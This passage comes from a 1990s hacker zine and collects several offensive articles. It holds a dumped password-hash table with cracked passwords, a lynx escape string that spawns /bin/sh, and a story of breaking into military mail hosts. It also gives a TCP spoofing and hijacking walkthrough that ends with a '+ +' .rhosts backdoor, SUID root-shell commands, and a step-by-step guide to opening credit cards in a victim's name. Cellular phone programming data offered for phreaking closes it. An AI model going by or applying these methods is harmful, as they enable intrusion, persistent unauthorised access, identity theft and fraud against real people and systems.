  670. <user name>:1048:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  671. <user name>:1049:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: 
  672. <user name>:1051:0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52:<user name>:: 
  673. test:1061:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: 
  674. <user name>:1062:6B35A2BA7D7C5B3AAAD3B435B51404EE:3A1B4CFCEB4385D1108253A357B2955E:<user name>:: 
  675. FILE-SERVER$:1066:79570B2F6875312AA1455905822538D8:D114D50DD21D6ADDEBB008E3231D7A44::: 
  676. NT$:1067:07128FE8EEB666E788371ED292FDCCE7:AF7C003BB0917BC28E37F1785E2B9018::: 
  677. <user name>:1068:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: 
  678. IUSR_FILE-SERVER:1069:338C0358DECFDA2902386B2E93EFFD10:9393E296495FDC72CCF951D249BB921F:<user name>:: 
  679. PLUTONIUM$:1070:C31C1D58633BE3ED27892589E3A13688:26BC63583A0EB0DB6E7C6DCA33F3AB00::: 
  680.  
  681. ----- 
  682.  
  683. V.   Results 
  684. ------------- 
  685.  
  686. User: [<user name>] Lanman PW: [LOBOS1] NT dialect PW: [lobos1] 
  687. User: [<user name>] Lanman PW: [MANDAR] NT dialect PW: [mandar] 
  688. User: [<user name>] Lanman PW: [SKIING] NT dialect PW: [skiing] 
  689.  
  690.  
  691. _____________________________________________________________ 
  692. Breaking out of Freenet Menu Shell 
  693. compiled by N-TREEG 
  694. Source and credit goes to:  CERT & General Protection Fault 
  695.  
  696. Freenet's are great becuase of the operative word _FREE_.  But most have 
  697. extremely restrictive menu  shells and for the most part, they won't give you 
  698. access to your favorite bourne (bash, csh) shell or  whatnot.  That really 
  699. sucks.  Do they not trust us with a fully functional interactive shell?  ;-) 
  700. Well I know that another online zine has published info on how to get to a 
  701. bourne shell through pine.  That took a  good bit of work to set up and get 
  702. going correctly.  I think this method is a lot easier.  All you need is  
  703. access to lynx.  (Being able to cut and paste helps too if you're as 
  704. lazy as I am.) 
  705. Here's how: 
  706.  
  707. Start up lynx.   
  708.  
  709. Hit g  (for go to). 
  710.  
  711. Enter this into the "URL to open:" field 
  712. LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/nul 
  713.  
  714. When it says "Enter a filename:" enter this 
  715.  /dev/null 
  716.  
  717. When it returns "File exists. Overwrite? (y/n)"  hit y 
  718.  
  719. You should hopefully see a beautiful little $ now.  There's your local 
  720. shell.  Have fun.  Aren't freenet's grand?  ;-) 
  721.  
  722.  
  723. "HaX0r3d PerceptionS leases ... THTJ ownz." 
  724.  
  725. N-TREEG 
  726. http://www.afn.org/~afn56746 
  727. HaX0r3d PerceptionS 
  728.  
  729.  
  730. _____________________________________________________________ 
  731. How to hack military e-mail servers....WaRsPrItE 
  732.  
  733.  
  734. -----BEGIN PGP SIGNED MESSAGE----- 
  735.  
  736.         Are our military networks safer than their civilian counter parts? 
  737. Most military bases, if not all military bases, have a some sort UNIX server 
  738. to route non-classified email. Usually, the machine is identified as 
  739. emh(electronic mail host).<basename>.<branch>.mil. It is extremely easy for 
  740. military members to get an account on one of these servers, simply call up 
  741. and request one. As we all know, military members quite often get orders to 
  742. other installations, especially those personnel stationed overseas. Due to 
  743. this fact, electronic mail hosts quite often have huge password files and 
  744. many of the accounts contained in that file are for users that "shipped out" 
  745. long ago and never had their account removed from the system. A friend of 
  746. mine exploited this one night when we discovered the fact that the server 
  747. also had it's security set so that every 6 months a new password containing 
  748. numbers or punctuation was required. The problem was that the system didn't 
  749. prompt you for your old password before requesting a new one. We tried 
  750. connecting to the system via Telnet on a hacked account from a generic ISP 
  751. with no luck. The good news was that we were overseas and overseas bases 
  752. have phone systems that are independant of the host nations' system. Meaning 
  753. there had to be a number to dial to get connected to the base's phone system 
  754. if you happened to be off the base. This number is realitively easy to get 
  755. just call the local base operator and ask for it. The kicker was that the 
  756. local dumbass jarhead Marine base was still running with X-Bar switching not 
  757. ESS like us. So here's what we did.... 
  758.  
  759. <Our Base> -> <Jarhead's dial up> -> <Our Dial Up> -> <Mail Host modem> 
  760.  
  761. After that, it was simple, we dialed in with a socially engineered legit 
  762. account and went to /etc and did a cat of passwd (NOT SHADOW!)and logged it 
  763. locally. After gaining a listing of accounts on the system we logged off. 
  764. After that, we just simply tried every login until we found one that was 
  765. overdue for a passwd change. We then set a password for it and made a note of 
  766. the account. If we wanted to pursue it further we could have done a finger on 
  767. the account to see which,if any, other servers the individual had accounts on 
  768. since the military uses the standard of, <first seven charaters of your last 
  769. name + first initial> to determine logins. I'm not offering this story as an 
  770. example of my k-rad 3l33t3 skillz. Just to show that simple exploits often 
  771. work the best. `Nuff said! 
  772.                                             WaRsPrItE 
  773. -----BEGIN PGP SIGNATURE----- 
  774. Version: PGP for Personal Privacy 5.0 
  775. Charset: noconv 
  776.  
  777. iQEVAwUBMd/EOH5eXk/jGmY7AQFz7Af/d/412J9CqTjyes4ojUo0eLT9+3KwEaXd 
  778. 1aVaB2+rJQ8oTHMWlfdng14IcisQLRuMsUlSwO7Ud4C/y1eELemu98OeqiP/2t+K 
  779. 9rCbphpBQ9a2Dhv37HeyxH0z+Gh+0eeeBbipAL/NVCgFQYKM8Jdong4BQwsgoCFR 
  780. PZo2eDScMCAQSI9a2MY285UnNGQIoeLXmcN626WEFOSYTC9trhXPdciHhsLtVBuT 
  781. zZuXzCYMMwC2+YP5IFyZgCMN29yw0wCe64hwbwo+/nS4Z0PEXvLsZPJO4oQOC5kU 
  782. 3P7tp8dvWjun4LP8LBt8806pYNgoQlKCJjxtJAhT752+imONDPefIA== 
  783. =V9P6 
  784. -----END PGP SIGNATURE----- 
  785. _____________________________________________________________ 
  786.  
  787. /* By memor / hbs      */ 
  788. /* some dns scanner using  */ 
  789. /* host command            */ 
  790. /* Tested on Linux 2.0.30  */ 
  791. /* last modified: 29/07/97 */ 
  792.  
  793. #include<stdio.h> 
  794. void main(int argc,char **argv)  
  795. char commande[50]; /* define commande as char string */ 
  796. if (argv[1]!=NULL) /* if an argument to the command */ 
  797. int compte=0,pause=0; /* define count & pause */ 
  798. printf("DNS Scanning from %s.1 to %s.255 \n",argv[1],argv[1]); /* presentation thing */ 
  799. sprintf(commande,"date"); /* string "date" in commande */ 
  800. printf("DNS Scanning began at this "); /* presentation thing */ 
  801. printf("%s :\n",commande); /* print wich command we use (presentation thing) */ 
  802. system(commande); /* execute command */ 
  803.    for(compte=1;compte<256;compte++) /* counting 1 to 255 */ 
  804.    { 
  805.    printf("Scan: "); /* presentation thing */  
  806.    sprintf(commande,"host %s.%i 2>/dev/null",argv[1],compte); /* string ""host %s.%i 2>/dev/null" in command */ 
  807.    printf("resolving %s.%i\n",argv[1],compte); /* presentation thing */ 
  808.    system(commande); /* execute command */ 
  809.           for(pause=0;pause<1000;pause++); /* little pause */ 
  810.    } 
  811. sprintf(commande,"date"); /* string "date" in commande */ 
  812. printf("DNS Scanning ended at this "); /* presentation thing */ 
  813. printf("%s :\n",commande); /* presentation thing */ 
  814. system(commande); /* execute command */ 
  815. else /* if no arguments typed */ 
  816. printf("1997 memor/hbs Usage : dns xxx.xxx.xxx \nfor searching from xxx.xxx.xxx.1 to xxx.xxx.xxx.255\n"); /* presentation thing and usage*/ 
  817.  
  818. _____________________________________________________________ 
  819.  
  820.                                   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
  821. <<=========-----------$$ Connection Hijacking Attack! $$----------=========>> 
  822.                                   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
  823.                                   God This is going to take a while! 
  824.  
  825.            This article includes all the goodies, and in complete detail tells 
  826. how to literally hack a server, using IP Spoofing, one of the most mis 
  827. understood terms in the underground. Stupid fuckers have been using IP 
  828. spoofing to go on irc and brag to their friends that they are k-rad. This 
  829. is not why ip spoofing came around, in this text I will explain to you, in 
  830. easy to understand language, that ip spoofing is just a step into the  
  831. process of gaining access to a server you are not supposed to have access 
  832. to.  
  833.  
  834. The Basics 
  835. ---------- 
  836. In order to further understand what I am about to explain you must have a  
  837. general knowledge of several things that I will explain in the following 
  838. paragraphs...So no need to start to pout yet ;) 
  839.  
  840. Three way Handshakes 
  841. -------------------- 
  842.            In order to start an actual data transfer of any kind on a network 
  843. you must have what you call a "three way handshake" it goes much like this. 
  844. You send what is called a SYN packet to a host, the SYN Packet has headers 
  845. which in turn tell the host that you want to connect to him, the host send 
  846. you back an ACK command, which tells you that its alive, and open for  
  847. connections, then you again send out an ACK Command to the host telling it 
  848. that your still alive, and the data transfer can begin. If that's a little 
  849. confusing, I agree, its confusing in words, but let me make a small diagram 
  850. on what a three way handshake looks like : 
  851.  
  852.                                          YOU --SYN-----> HOST 
  853. (You send out a SYN Packet to the host, telling it you want to connect) 
  854.                                          YOU <--ACK----- HOST 
  855. (Host responds with an ACK or acknowledgment that it is alive and open) 
  856.                                          YOU -----ACK--> HOST 
  857. (You respond back and the data transfer can now begin..) 
  858.  
  859.            Every time you do a regular data transfer on the internet such as 
  860. bring up a webpage this three way handshake commences. So now you know how 
  861. data gets from that machine to yours, this little information is the basis 
  862. of this attack. 
  863.  
  864.  
  865. .rhosts and trusted servers 
  866. --------------------------- 
  867.            Aright lets say you have in internet account, with a local Internet 
  868. service provider (ISP), AND you have an account with another server, which 
  869. gives you a shell account. A shell account is basically an account on the  
  870. servers UNIX operating system. They give you a home directory in which you 
  871. have access to the text editors such as Joe, and Pico, and you can also  
  872. work on c programs using the gcc compiler.  
  873.            O.K. now lets say you want to save some time, so you want to make 
  874. the process of logging in to the shell account shorter, or maybe eliminate it 
  875. completely. Well due to the trust that a UNIX operating system has with its 
  876. users, this can be done, the process of entering a password at the login  
  877. screen can be illiminated. This can be done with a file called .rhosts, which 
  878. will grant or deny access based off the IP address of the person trying to  
  879. logon to the shell account its self. 
  880.            The server that is in the .rhosts file is called the trusted server 
  881. for the fact that when it sees that IP address it trusts them. It thinks 
  882. that they are the person that is supposed, and allowed to be there. UNIX  
  883. will trust ANYONE with the specified ip address in the .rhosts file.  
  884.  
  885. SYN Flooding 
  886. ------------ 
  887.            A port on most UNIX operating systems can only handle a certain  
  888. number of connections to one port at a time, this is called the "backlog". If  
  889. the backlog is filled up all incoming SYN connections will be ignored.  
  890. Leaving them not allowed to connect to the server until the other  
  891. connecting requests are dealt with properly.  
  892.            But if the SYN headers are spoofed when sent to the host the host 
  893. will keep on trying to successfully find the person who sent the original  
  894. syn message to it, and wont let anyone connect until it is done. Here's the 
  895. step of a SYN Flood 
  896. 1) Person uses ip spoofer to spoof his original ip address and sends out a 
  897. several SYN packet to a specified port at a host. 
  898. 2) The host's port gets flooded with SYN's and try's to reply to the SYN  
  899. command but cant because the person who sent the original SYN is not a 
  900. real host, leaving the ports closed, so no other connections can be made into 
  901. that host. 
  902.  
  903.   YOU (Spoofed IP) --SYN-----> HOST |  
  904.   YOU (Spoofed IP) --SYN-----> HOST |  
  905.   YOU (Spoofed IP) --SYN-----> HOST |  
  906.   YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections 
  907.   YOU (Spoofed IP) --SYN-----> HOST | Will be ignored because all the  
  908.   YOU (Spoofed IP) --SYN-----> HOST | connections are taken 
  909.   YOU (Spoofed IP) --SYN-----> HOST | 
  910.    X (Not really real) <--ACK-- HOST| 
  911.  
  912. So in turn the HOST cannot find YOU (With the spoofed IP) so the port is left 
  913. flooded because the host will not drop the connections until they are fur 
  914. filled. After a bit the server will crash.. This is called a "Denial of  
  915. service attack" For the fact that it denies anyone else service to that host 
  916. you can read more about denial of service in this newsletter. 
  917.  
  918. Sequence Numbers? 
  919. ----------------- 
  920.            Sequence Numbers are a prime factor in this attack, but also kinda 
  921. hard to explain. I only have a general knowledge of sequence numbers, but a 
  922. general knowledge is a hell of alot better then no knowledge ;) Every byte  
  923. that you transfer from one computer to another on a Internet network it is  
  924. assigned a sequence number. Sequence Numbers are assigned to make sure that 
  925. the connection that is made doesn't become corrupt.  
  926.            Lets say we didn't have sequence numbers, then maybe by accident we 
  927. got a repeat of a byte, that would corrupt our data right there.  
  928.            IN a three way handshake, the first sent SYN packet contains what is 
  929. called the Initial Sequence number, that sequence number tells the host what 
  930. the next sequence number is. (Confused yet) This will all come together when 
  931. I explain the attack at itself, its all got to do with timing and round 
  932. trip time.  
  933.            Round trip time is how long it takes your SYN packet to reach the 
  934. host and the host to send back its ACK (acknowledgment) lets say you had to 
  935. do this all by hand, you send out the SYN command, and the host sends  back 
  936. the ACK command, you have to calculate the exact sequence numbers timing 
  937. in order to send the ACK back to the host to start the data transfer. 
  938.            -If the sequence number you send is a smaller number then what  
  939.             the server expects it will just throw that try off, because it 
  940.             thinks its an old packet that never reached or has failed before 
  941.            -If the sequence number is exactly what the host expected, it will 
  942.             let the ACK come through and the data transfer can begin. 
  943.            -If the sequence number you send is greater then what the host 
  944.             expects it will hold that sequence number, because it think that 
  945.             it is a future bit, and it will hold it until the other bits 
  946.             come through first.. 
  947. Trust me this may all sound stupid now when I'm explaining it, but it all  
  948. does come together when I start explaining the attack, you need to be able 
  949. to spoof the ACK command that goes to the host when doing the 3 way handshake 
  950.  
  951.            Oh and each time a connection is made to the host that you are making 
  952. the connection to the sequence numbers goes up 64,000. The Incicial sequence 
  953. number goes up 128,000 every one second, and wraps every 9.32 hours. This 
  954. counting process will be needed later on in the attack.. 
  955.  
  956. The Attack 
  957. ---------- 
  958.            I really cant express enough how much you need to understand the above 
  959. features before going and trying to execute this attack, just for the fact 
  960. that you will not be successful in your attempt, it took me 3 good days of 
  961. reading to readily understand sequence numbers, and I suggest you also read 
  962. all you can on sequence numbers, do searches, read internet protocol articles 
  963. just make sure you understand what you are doing before you get your hopes 
  964. up to find out that you didn't calculate the Round trip time right and you 
  965. end up with a smaller sequence number then originally intended. Its a bummer 
  966. and a waste of time if you don't understand it.  
  967.  
  968. Short Explanation 
  969. ----------------- 
  970. 1)Choose the target 
  971. 2)Find trusted host 
  972. 3)SYN Flood trusted host 
  973. 4)Spoof the trusted host 
  974. 5)Guess the sequence numbers for the outgoing ACK 
  975. 6)Make the connection 
  976. 7)Leave a backdoor in the .rhosts file 
  977.  
  978. Finding a Target 
  979. ---------------- 
  980.            This should be fairly easy based on the fact that if your the kind  
  981. of person who has a personal vendetta with a server or you just want to try 
  982. this out on. Or you can get special permission from 2 hosts that will allow 
  983. you to do this as a security measure, that is probably the best way to go to 
  984. avoid any sorts of criminal prosecutions. I urge you to not in any way  
  985. incriminate yourself, this text is for security reasons only to inform, and 
  986. protect. This attack is NOT new, I did not make up this attack, I'm only  
  987. explaining it, and how to prevent it. So don't come crying to me when you get 
  988. raided and you have no where else to go. Stay safe and be paranoid.  
  989.  
  990. Finding a targets Trusted Host 
  991. ------------------------------ 
  992.            Once you have your target, you want to find out if it has a trusted  
  993. host, since you cant go into their computer and look to see if they even have 
  994. an .rhosts file you have to do the checking out yourself. If the target host  
  995. does not have a trusted host, this whole text is very pointless, but from 
  996. here on in, I am talking as if the target host does in fact have a trusted  
  997. host. 
  998.  
  999.            This is where you use your talent of social engineering. Finding the 
  1000. trusted host is hard, Ill admit that, but if your going to go this far you  
  1001. might as well find out about the system your going to hack, know what your  
  1002. doing, know the system before you go in. Here is a list of possible ways  
  1003. to maybe gain information about trusted hosts. 
  1004.  
  1005.            showmout -e target ->SHows where the file systems are exported 
  1006.            finger -l @target 
  1007.            finger -l @trustedserver.com 
  1008.            finger -l root@trustedserver.com 
  1009.            rpcinfo -p x-terminal 
  1010.  
  1011.            These are a couple of ways off the top of my head, but you can always 
  1012. find shit out, Basically use your head in this matter, because well, this isn't 
  1013. the hardest part of the attack, it may seem that way now, but it only gets 
  1014. harder from here on out. Talk to a representative of the company, I dunno  
  1015. read up on social engineering... 
  1016.            Over all this attack all comes down to trusted hosts, which are 
  1017. inserted into the .rhosts file itself, this is why I spent a some time  
  1018. explaining .rhosts files, because if you can become the trusted host you  
  1019. also have access to the target host. Is this getting better by the minute or 
  1020. what? 
  1021.  
  1022. SYN Flood trusted host 
  1023. ---------------------- 
  1024.            In order for this whole thing to go through the trusted host must be 
  1025. taken out with a SYN flood (SYN Flood was discussed earlier in this article) 
  1026. for the fact in later parts of this attack you need to spoof as the trusted  
  1027. host then send out a SYN command to the target host's port to try to connect 
  1028. to it, and if the host your attacking can send a message back to the trusted 
  1029. host, it would get an error saying that host did not send out a SYN packet  
  1030. for an opening connection, so in turn to make sure that does not happen. You  
  1031. must flood the ports of the trusted host so no other connections can be made. 
  1032.          
  1033.         *NOTE* This is because you are flooding ports on the trusted host 
  1034.                   and when the port in the trusted host is still looking for  
  1035.                   someone to send back an ACK (It is still gagged by the SYN flood) 
  1036.                   command to it doesn't let any other connections come through. So  
  1037.                   you can successfully guess their sequence numbers that you guess 
  1038.                   (IN time) that the trusted host would send to the target host. 
  1039.             
  1040.            SYN flooding software is readily available at many "Underground" sites 
  1041. and I wont go into posting the code here for the fact I'm just wasting space 
  1042. when you can do a search on the internet yourself and find it. For example a 
  1043. very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder. 
  1044. But this NEEDS to be done, you don't need any interruption's in this attack.  
  1045.  
  1046. Sample the sequence numbers 
  1047. --------------------------- 
  1048.         Because you are not the real host you are mearly a spoofed version of 
  1049. the trusted host, you also have to spoof the return sequence number. Remember 
  1050. in the three hand shake there is first a SYN from you, that tells the host 
  1051. that you want a connection to its server, then the host sends back an ACK  
  1052. or acknowledgment.  
  1053.         So if you spoof the trusted server and send out a SYN packet, the 
  1054. server you just sent the SYN packet to will try to reply back. If you don't 
  1055. guess the right sequence numbers (OR the timing of the transfer) it wont 
  1056. let you log in. See if the REAL trusted host was available (Not under a SYN 
  1057. flood) the real trusted host would have given the other host an error. But  
  1058. with the SYN flood gumming up the works, and not allowing any other  
  1059. connections, you can successfully spoof back the ACK back to the host so 
  1060. you can connect. 
  1061.         Before you do the initial attack connect to one of the major ports 
  1062. on the server your going to attack, like port 25 (The sendmail port) and 
  1063. sample its sequence numbers. You need to calculate how long it takes for  
  1064. Your SYN reaches the server and an SYN/ACK is sent back to you, then the  
  1065. ACK you send back to the host, all in one. Do this many times until you have 
  1066. enough you feel is a good diagram to round up and become a one figure.  
  1067. Remember sequence numbers go up 128,000 a second, and 64,000 per connect. 
  1068.  
  1069.            -If the sequence number you send is a smaller number then what  
  1070.             the server expects it will just throw that try off, because it 
  1071.             thinks its an old packet that never reached or has failed before 
  1072.            -If the sequence number is exactly what the host expected, it will 
  1073.             let the ACK come through and the data transfer can begin. 
  1074.            -If the sequence number you send is greater then what the host 
  1075.             expects it will hold that sequence number, because it think that 
  1076.             it is a future bit, and it will hold it until the other bits 
  1077.             come through first.. 
  1078.  
  1079.  
  1080.  
  1081. Spoof the trusted host 
  1082. ---------------------- 
  1083.         This is easy there are many ip spoofer software for linux and the  
  1084. unix flavors, just pick one of these up and compile it. *NOTE* You must have 
  1085. root on the linux operating system you are doing the attack from for the fact 
  1086. that if you just have a regular home directory you cannot open up raw  
  1087. connections in which are needed for a general spoof.  
  1088.  
  1089.         So load it up and spoof the address of the TRUSTED host, and go right 
  1090. on to the next part. 
  1091.  
  1092. The heart of the attack 
  1093. ----------------------- 
  1094.         This is the main part of the attack, once you are spoofed as the  
  1095. trusted host, you should send a connection request to port 513 (The login  
  1096. port) Then the host will then send back a SYN/ACK to the trusted host, which 
  1097. is under the gagging of the SYN Flood so it wont accept anymore connections 
  1098. hence it wont get an error back. While this is all going on we have to wait 
  1099. for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK  
  1100. back to the host you are attacking with your guessed Sequence number attached 
  1101. (Plus one because we are sending for a login) If your guess is correct it  
  1102. will then accept your connection. 
  1103.         Type the magical word root and since that .rhosts file is there, and 
  1104. you are spoofed as the trusted host, you will get automatic access to the 
  1105. system. Isn't unix great? Trust is a great thing to encounter in any type 
  1106. of linux operating system. 
  1107.  
  1108. Once inside.. 
  1109. ------------- 
  1110. Since you really don't need to edit or destroy any log files, you are home  
  1111. free, but as one last thing we do, we will put in a backdoor so we can 
  1112. access their system as we please (No more of this spoofin shit) so we do a 
  1113. cat + + >> ~/.rhosts . When you add a + + (as explained earlier) its basically 
  1114. saying any host is allowed without entering a password. The only problem 
  1115. with that alot of systems now adays are equipped with a program that looks 
  1116. for .rhosts files that have a + + file..But oh well fuck it, your in it just 
  1117. for the hack of it right?  
  1118.  
  1119. Conclusion paragraph 
  1120. -------------------- 
  1121.         Basically this attack is very useful if you know what you are doing.  
  1122. This wasn't as 'in depth' as I would have liked to go, but well, I'm not the  
  1123. kind of person who can splash what's all in my head onto a piece of paper, its 
  1124. easier for me to consume information then give it away. But I tried my best 
  1125. and I hope you could understand it.  
  1126.         Id like to give a couple shoutouts to the people who made this  
  1127. article happen. Phrack, Modify for teaching me the art of spell check, and 
  1128. the whole 0 cr3w. Remember before asking a question, always try to answer it 
  1129. yourself first. 
  1130.                                                  
  1131.                                                         Phe3r m3, 
  1132.                                                         Merde Fuk 
  1133.  
  1134. _____________________________________________________________ 
  1135. One method to keep root...............WaRsPrItE 
  1136.  
  1137.  
  1138. -----BEGIN PGP SIGNED MESSAGE----- 
  1139.  
  1140.         First off, this is NOT a true hack since it requires that you have 
  1141. root access to begin with. I'm including it only as a way to keep root once 
  1142. you find it. I mean c`mon, how hard is it to write a simple script or batch 
  1143. job to do a "who -a | grep root" every five minutes and log the output to a 
  1144. file at $home/.root and tail it to an xterm window? Sooner or later root will 
  1145. forget to log off! I've only managed to get this to work on a few *NIX 
  1146. systems and Solaris 2.4.1 and higher has fixed this hole. But those assholes 
  1147. at Santa Cruz Operations ...... *evil grin* 
  1148.  
  1149. # cp /bin/sh $home/.root_shell 
  1150. # chmod 4111 $home/.root_shell 
  1151.  
  1152. These commands create a SUID root version of the Bourne shell ("stickey bit") 
  1153. in the home directory of the user. I personally use a file name with a "." 
  1154. just to keep prying eyes out. You can optionally use commands like "chmod g+s" 
  1155. to execute a file as the GUID of the file. Assuming of course you have access 
  1156. as the approiate group to begin with. Which is easy `cause people always 
  1157. forget to log off (especially around lunch time :) )This would be handy in 
  1158. case you want to look at payroll records in say the "accounting" group. 
  1159. Once again, security compromise via stupid end users! 
  1160.  
  1161.                                             WaRsPrItE 
  1162.  
  1163. -----BEGIN PGP SIGNATURE----- 
  1164. Version: PGP for Personal Privacy 5.0 
  1165. Charset: noconv 
  1166.  
  1167. iQEVAwUBMd/HlH5eXk/jGmY7AQHPpQf/cn2vesmlxbIOdpIiVY53FUcoJmihsEuc 
  1168. eTBMdCtyBibLxzVk9xak2GTtNcxppFphtLWh3v0f5aKF61NFSMsj7g1e1DcmMAn5 
  1169. KTijlQc2pgB0OLhorsTA+/rSGl/TRa4uNVIYLpvCoU1H+5Y/kP8RuD1kgvgvl7Xe 
  1170. R0zHmfqMYnRz5U8nedH2xagvnxnRixglt+bnYZS5/4fGuE9b2oz6iKbA7hG+ya9Q 
  1171. rlTBvSd9uUw7nwtJgBdj7MMtlGwRhCUWP0pQBniYSbBOMfRZ22gL8is5lI2f8Tqh 
  1172. To0YOe6T1dPvkYzYmvafz3F6IR5pnSltONeuUaeCSI3nBWGrpiaU/A== 
  1173. =JVIc 
  1174. -----END PGP SIGNATURE----- 
  1175.  
  1176. -==-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=----=-=-=-=-=-=--= 
  1177.  
  1178. Carding..more basics for the lame...  BY ArcAngl 
  1179.  
  1180. To check if a CC # is valid phone 1-800-228-1122 (need merchant # usually 5 digits) 
  1181.  
  1182.  
  1183.  
  1184. To obtain a valid credit card under someone else's name: 
  1185.  
  1186. 1. Identify a target name, such as one of your teachers, co-workers, ect... 
  1187.  
  1188. 2. Once you have a target name, you need to obtain their SSN.  This can be done in many ways 
  1189. using social engineering.  For example:  call up the target's electric company, saying you are 
  1190. him, and that you need to make a change to you mailing information possibly.  Ask them what  
  1191. information they have on record.  Then say, also, IÆd like to verify my SSN that you have, I had a mix up a  
  1192. few years ago, and I want to make sure you have the correct one...what do you have?   
  1193.  
  1194. 3. Once you have the targetÆs SSN, obtain a Visa/MasterCard application.  You can find these in many  
  1195. places: banks, magazine inserts, ect...or simply call and request one.  Once you have the application,  
  1196. simply fill out the form with the targetÆs name.  Now the hard part:  for the address, you will need to have  
  1197. a place that you have access to the mail delivery.  DO NOT USE YOUR OWN!  You may try: neighbors  
  1198. on extended vacation, house where people just moved out, house just built, a friend that will deny any  
  1199. receipt of a card, ect...you get the picture.  Then fill in the targetÆs SSN and the rest of the info.  Then  
  1200. simply mail it!  You may also call in the info and ask for overnight processing.  Do this from a payphone, or op divert 
  1201. for the uberelite!   
  1202.  
  1203. 4. The new card will be sent to the address you specified.  It will be a valid card, in the targetÆs name and  
  1204. all charges will reflect on the targetÆs credit report.  It will take monthÆs for the target to realize there is a  
  1205. card out there in his name.  You have the physical card in your possession...how many times does  
  1206. WalMart ask for ID when charging a new Pentium?  NONE!!!!  Oh yeah...watch for cameras that will id  
  1207. you! 
  1208.  
  1209.  
  1210.  
  1211. _____________________________________________________________ 
  1212. Cellular Programming Archives, Pt. I  from Phrax 
  1213.  
  1214.            Phrax has been kind enough to provide everyone with a large 
  1215.            volume of information on cellular phone programming for about every 
  1216.            phone out there. Over the next few months, THTJ will be posting 
  1217.            cellular information from the large archive that Phrax has collected. 
  1218.            And, as always, this information is for informative purposes only, so 
  1219.            we know you will only use it for that, and not to phreak some phones 
  1220.            ..... ( yea right! ). 
  1221.  
  1222. ------- 
  1223.  
  1224. AUDIOVOX BC40, 45, CMT400, 405, 410, 450, 550, 600, 605, 750, 1700, SP75 
  1225.  
  1226. NOTES:  This is a single NAM unit. 
  1227.            The ESN prefix is 138 decimal, 8A hex (Toshiba) 
  1228.            You MUST know the lock code to program this unit. 
  1229.            Audiovox: 516-231-6051/213-926-7758 
  1230.  
  1231. NAM programing: 
  1232.  
  1233. 1.  With the power turned on enter N N N FUNC # 1, where NNN is the three 
  1234.     digit lock code.  The manufacturers default is 000 
  1235.  
  1236. 2.  The # key increments the step number. 
  1237.  
  1238. 3.  The * key decrements the step number. 
  1239.  
  1240. 4.  STO enters the data for each step. 
  1241.  
  1242. 5.  You MAY directly access any step by pressing RCL followed by the step 
  1243.     number. 
  1244.  
  1245. 6.  FUNC SND completes programing. 
  1246.  
  1247. 7.  FUNC CLR exits programing mode. 
  1248.  
  1249. PROGRAMING DATA: 
  1250.  
  1251. STEP#    #OF DIGITS/RANGE    DESCRIPTION 
  1252.  
  1253. 01       3 DIGITS            FIRST THREE DIGITS OF PHONE NUMBER 
  1254. 02       4 DIGITS            LAST FOUR DIGITS OF PHONE NUMBER 
  1255. 03       3 DIGITS            LOCK CODE 
  1256. 04       3 DIGITS            AREA CODE 
  1257. 05       00001 - 32767       SYSTEM ID 
  1258. 06       0 OR 1              HORN ALERT 
  1259. 07       0 OR 1              HANDS FREE 
  1260. 08       0 OR 1              CONTINUOUS DTMF 
  1261. 09       0 OR 1              REPERTORY DIALLING 
  1262. 10       00 TO 15            GROUP ID (10 FOR USA) 
  1263. 11       00 TO 15            ACCESS OVERLOAD CLASS 
  1264. 12       0000  (ONLY)        STATION CLASS MARK 
  1265. 13       0 OR 1              LOCAL USE MARK 
  1266. 14       0 OR 1              MIN MARK 
  1267. 15       0333/0334           IPCH, AUTOMATICALLY SET 
  1268. 16       0 OR 1              PREFERRED SYSTEM, AUTOMATICALLY SET 
  1269. 17       000 TO 255          SEE NOTE 1 BELOW 
  1270. 18       000                 SET TO 000 ONLY 
  1271. 19       000                 SET TO 000 ONLY 
  1272. 20       00001 - 99999       SYSTEM ID INHIBIT 
  1273. 21       0 TO 31             HORN ALERT TIME OUT IN HOURS (CMT 550 ONLY) 
  1274. 22       0 TO 31             ELEC MESSAGE RECORDER TIME OUT IN HOURS 
  1275.                                             (CMT 550 ONLY). SEE ALSO NOTE 2 BELOW. 
  1276. 23       0 TO 255            NO CHARGE AIR TIME DELAY IN SECS (NOT ALL MODELS) 
  1277. 24       000 TO 999          AIR TIMER CLEAR CODE 
  1278. 25       000                 SET TO 000 ONLY 
  1279. 26       CHECKSUM            AUTOMATICALLY SET 
  1280. 27       CHECKSUM            AUTOMATICALLY SET 
  1281.  
  1282.  
  1283. NOTES: 
  1284.  
  1285. 1.  These options can be selected by adding together the following 
  1286.     codes: 
  1287.  
  1288. 0 = No options, 
  1289. 1 = Preferred system lock (not on CMT 550) 
  1290. 2 = Auto Lock (CMT 550 only), 
  1291. 4 = Call timer beep CMT 550 only), 
  1292. 8 = Home Roam inhibit, 
  1293. 16 = Automatic system redial (CMT 550 only). 
  1294.  
  1295.     Add together the codes of the desired options, for example to select 
  1296.     Call timer beep and auto redial add 4 to 16 for a code of 020. 
  1297.  
  1298. 2.  1 to 31 hours, except that a setting of 0 will turn phone off after 
  1299.     8 hours. 
  1300.  
  1301. LOCK: F 4.  UNLOCK: Enter three digit code. 
  1302.  
  1303. A/B SYSTEM SELECT: 
  1304.  
  1305. This procedure only works on models manufactured after September 19, 1987. 
  1306. The first two digits of the serial number indicate the month (01-12), the 
  1307. third digit of the serial number indicates the last digit of the year (198n). 
  1308.  
  1309. FCN 7 STO = PREFERRED SYSTEM, 
  1310. FCN 8 STO = HOME SYSTEM ONLY, 
  1311. FCN 9 STO = NON PREFERRED SYSTEM, 
  1312. FCN 0 SWITCHES BETWEEN A/B AND B/A, 
  1313. PRESS STO WHEN THE DESIRED OPTION IS DISPLAYED. 
  1314.  
